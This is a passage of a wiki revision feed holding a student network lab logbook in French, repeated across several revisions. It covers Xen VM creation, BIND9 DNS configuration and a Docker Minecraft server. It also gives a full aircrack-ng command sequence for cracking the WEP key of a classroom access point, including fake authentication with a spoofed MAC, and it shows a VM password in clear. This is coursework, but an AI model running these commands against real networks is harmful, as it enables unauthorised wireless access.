[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Minecraft_pc.png&amp;diff=60092</id>
		<title>Fichier:Minecraft pc.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Minecraft_pc.png&amp;diff=60092"/>
				<updated>2022-11-28T10:52:38Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60091</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60091"/>
				<updated>2022-11-28T10:52:05Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* MINECRAFT */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Docker_minecraft.png&amp;diff=60085</id>
		<title>Fichier:Docker minecraft.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Docker_minecraft.png&amp;diff=60085"/>
				<updated>2022-11-28T10:34:30Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60083</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60083"/>
				<updated>2022-11-28T10:34:15Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60058</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
